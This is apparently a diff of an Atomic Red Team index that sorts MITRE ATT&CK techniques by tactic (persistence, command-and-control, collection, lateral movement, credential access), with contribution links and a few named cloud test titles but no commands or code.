+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+ - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+ - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+ - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+ - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# command-and-control
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.003 Proxy: Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1571 Non-Standard Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.001 Proxy: Internal Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# collection
+- T1560.001 Archive Collected Data: Archive via Utility [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1113 Screen Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# lateral-movement
+- T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- - Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.003 Credentials from Password Stores: Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.004 Unsecured Credentials: Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1555.006 Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
